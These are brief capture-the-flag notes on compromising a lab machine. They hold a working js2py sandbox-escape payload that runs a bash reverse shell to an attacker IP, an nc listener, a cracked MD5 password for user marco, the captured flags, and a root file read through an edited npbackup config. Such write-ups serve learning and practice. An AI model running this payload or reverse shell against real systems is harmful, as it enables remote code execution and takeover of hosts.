nmap -A 10.10.11.82
22 ssh
8000 Http | http://10.10.11.82:8000

ECMA 5.1. 
js2py 0.74

reverse shell to explore using 

let cmd = "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.184/9001 0>&1'"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {
    let result;
    for (let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if (item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if (item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()

listneing on nc -lvnp 9001 

discovered instance/user.db

python3 -m http.server 8000 on reverse shell to get user.db

found user marco with has 649c9d65a206a75f5abe509fe128bce5
has md5 decodes to sweetangelbabylove

username: marco
password: sweetangelbabylove

user.txt : a70e5426127f3a9c24398209b6d60066

cp npbackup.conf and edited backup to path root and dumped file root.txt

root.txt : dd204a9a2b7e1001676e448b306a1dc5
